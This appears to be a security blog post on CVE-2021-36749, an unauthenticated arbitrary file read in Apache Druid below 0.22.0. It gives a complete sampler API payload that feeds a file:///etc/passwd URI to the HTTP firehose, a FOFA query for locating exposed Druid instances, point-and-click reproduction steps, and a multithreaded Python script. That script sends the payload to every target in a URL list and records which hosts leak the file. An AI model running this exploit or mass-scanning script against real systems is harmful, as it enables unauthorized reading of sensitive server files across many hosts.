Apache Druid Arbitrary File Read Vulnerability (CVE-2021-36749)

0x01 Component Overview

Apache Druid is a distributed data processing system that supports real-time, multi-dimensional OLAP analysis. It handles both high-speed real-time data ingestion and flexible, low-latency multi-dimensional analytical queries, which makes it a common choice for fast, flexible OLAP analysis over big data. Druid also supports timestamp-based pre-aggregation at ingestion time and aggregate analysis, so it is frequently used in time-series data processing and analysis scenarios as well.

0x02 Vulnerability Details

The vulnerability exists because Druid does not restrict the URL schemes a user may supply to the HTTP InputSource: application-level restrictions can be bypassed by passing a file URL to the HTTP InputSource. An unauthenticated attacker can therefore craft a malicious request that reads local files, ultimately leaking sensitive information from the server.
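Concretely, the read is triggered through Druid's sampler API. The JSON payload below is the one used in the batch script later in this post, expanded here for readability; note that the `http` firehose is simply handed a `file://` URI:

```python
# Anatomy of the sampler request that triggers the read. Vulnerable
# versions (< 0.22.0) do not reject the file:// scheme in the URI list.
payload = {
    "type": "index",
    "spec": {
        "type": "index",
        "ioConfig": {
            "type": "index",
            # file:// instead of http:// -- this is the entire bypass
            "firehose": {"type": "http", "uris": ["file:///etc/passwd"]},
        },
        "dataSchema": {
            "dataSource": "sample",
            "parser": {
                "type": "string",
                "parseSpec": {
                    "format": "regex",
                    "pattern": "(.*)",  # capture each file line whole
                    "columns": ["a"],
                    "dimensionsSpec": {},
                    "timestampSpec": {
                        "column": "!!!_no_such_column_!!!",
                        "missingValue": "2010-01-01T00:00:00Z",
                    },
                },
            },
        },
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
}
# POSTed as JSON to <target>/druid/indexer/v1/sampler?for=connect
```

The `timestampSpec` points at a column that never exists so every sampled line falls back to the fixed `missingValue` timestamp, letting arbitrary (non-timestamped) file content pass through the sampler.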

0x03 Affected Versions

Apache Druid < 0.22.0

0x04 FOFA Syntax

title="Apache Druid"

0x05 Reproduction

Click "Load data".


Select "http(s)://", then click "Connect data".


Enter the following in the URLs field:

file:///etc/passwd


The contents of /etc/passwd are successfully retrieved.

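Before automating detection, it is worth pinning down the success indicator: on a vulnerable host the sampler's JSON response embeds the raw lines of the requested file, so spotting the conventional root entry of /etc/passwd in the body is enough. A small illustrative helper (the sample response below is a shortened, hypothetical example, not a verbatim Druid response):

```python
def leaked_passwd(body: str) -> bool:
    # "root:x:0:0:" opens the root entry on virtually every Linux system;
    # seeing it in the response means the file:// URI was actually fetched.
    return "root:x:0:0:" in body


# Shortened, hypothetical sampler response for illustration:
sample_body = '{"data":[{"input":{"raw":"root:x:0:0:root:/root:/bin/bash"}}]}'
print(leaked_passwd(sample_body))    # True
print(leaked_passwd('{"data":[]}'))  # False
```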

Batch verification script

# -*- coding: utf-8 -*-
# @Time : 2021/11/21 17:15
# @Auth : AD钙奶
import requests
from concurrent.futures import ThreadPoolExecutor

# Silence the InsecureRequestWarning caused by verify=False
requests.packages.urllib3.disable_warnings()


def verify(target):
    url = target + '/druid/indexer/v1/sampler?for=connect'
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
    # The "http" firehose is handed a file:// URI; vulnerable versions fetch it
    # and return the file's lines in the sampler response.
    json_data = {"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris": ["file:///etc/passwd"]}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "regex", "pattern": "(.*)", "columns": ["a"], "dimensionsSpec": {}, "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "2010-01-01T00:00:00Z"}}}}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
    try:
        res = requests.post(url, headers=headers, json=json_data, timeout=10, verify=False, allow_redirects=False)
        if 'root:x:0' in res.text:
            info = "[+] Vulnerable to CVE-2021-36749: " + target
            save_vuln(info)
            print(info)
    except requests.RequestException:
        pass


def save_vuln(info):
    with open("vuln.txt", 'a', encoding='utf-8') as f:
        f.write(info + '\n')


def get_file_url():
    # One target base URL per line, e.g. http://host:8888
    with open("url.txt", 'r', encoding='utf-8') as f:
        return [line.strip() for line in f if line.strip()]


def main():
    targets = get_file_url()
    with ThreadPoolExecutor(max_workers=50) as pool:
        pool.map(verify, targets)


if __name__ == "__main__":
    main()